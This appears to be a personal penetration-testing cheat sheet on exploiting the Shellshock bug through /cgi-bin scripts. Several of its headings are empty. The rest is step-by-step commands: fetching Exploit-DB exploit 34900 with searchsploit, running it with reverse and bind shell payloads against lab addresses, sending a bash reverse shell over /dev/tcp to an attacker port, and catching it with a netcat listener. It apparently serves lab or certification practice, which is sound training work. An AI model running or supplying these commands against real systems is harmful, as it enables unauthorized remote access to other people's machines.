/cgi-bin Shellshock
#NMAP
#Curl POC to check whether target is vulnerable
#Variant
#Curl revshell (Kali $ip 10.10.10.10)
#Searchsploit
https://www.exploit-db.com/exploits/34900
[1]sudo searchsploit -m linux/remote/34900.py
Examples:
./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234
[2] Get a pseudo-shell (unstable)
./34900.py payload=reverse rhost=192.168.101.171 lhost=192.168.101.160 lport=1234 pages=/cgi-bin/test
Variant:
./exploit.py payload=reverse rhost=10.11.1.71 lhost=192.168.119.177 lport=443 pages=/cgi-bin/test.cgi,/cgi-bin/admin.cgi
[3]From initial pseudoshell, send another bash reverse shell back to kali, make sure you select a different port (quad 4)
bash -i >& /dev/tcp/192.168.101.160/4444 0>&1
[4]Catch the connection back on kali
nc -nvlp 4444
#Fuzzing using gobuster
#Metasploit
#shocker
Last updated